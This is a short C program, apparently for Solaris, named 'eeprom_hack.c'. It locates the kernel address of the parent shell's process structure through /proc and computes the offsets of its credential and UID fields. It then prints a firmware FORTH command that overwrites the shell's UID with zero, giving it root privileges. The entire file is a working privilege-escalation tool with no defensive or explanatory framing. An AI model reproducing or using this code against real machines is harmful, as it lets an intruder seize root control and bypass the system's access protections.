/*
    eeprom_hack.c
    johnc@grok.org.uk 23rd July 2003
*/

#include <fcntl.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/proc.h>
#include <sys/cred.h>
#include <unistd.h>

int main(int argc, char *argv[]) {

    struct proc proc_struct;
    struct cred cred_struct;
    long offset1, offset2;
    pid_t parent;
    struct psinfo psinfo_struct;
    char filename[32];
    int psfile;
    uintptr_t target;

    /* Find offset of credentials in process structure, and
       the offset of the UID in the actual credentials structure */

    offset1 = (long) &proc_struct.p_cred - (long) &proc_struct;
    offset2 = (long) &cred_struct.cr_uid - (long) &cred_struct;

    /* Get parent PID and then the base address */

    parent = getppid();
    snprintf(filename, sizeof(filename), "/proc/%u/psinfo", parent);

    psfile = open(filename, O_RDONLY, 0);
    if (psfile < 0) {
        perror(filename);
        exit(1);
    }
    if (read(psfile, &psinfo_struct, sizeof(psinfo_struct)) != sizeof(psinfo_struct)) {
        perror("read");
        exit(1);
    }
    close(psfile);

#ifdef PR_MODEL_NATIVE
    if (psinfo_struct.pr_dmodel != PR_MODEL_NATIVE) {
        fprintf(stderr, "ERROR: Target process is %s but this binary is %s.\n"
                "Recompile natively on the target machine.\n",
            psinfo_struct.pr_dmodel == PR_MODEL_LP64 ? "64-bit" : "32-bit",
            PR_MODEL_NATIVE == PR_MODEL_LP64 ? "64-bit" : "32-bit");
        exit(1);
    }
#endif

    target = psinfo_struct.pr_addr;

    if (!target) {
        fprintf(stderr, "ERROR: pr_addr is null.\n");
        exit(1);
    }

    printf("Shell with PID %ld found at address 0x%lx\n", (long)parent, (unsigned long)target);

    /* Print the FORTH command for this architecture */
    printf("\nhex 0 %lx %lx + x@ %lx + l!\n\n", (unsigned long)target, offset1, offset2);
}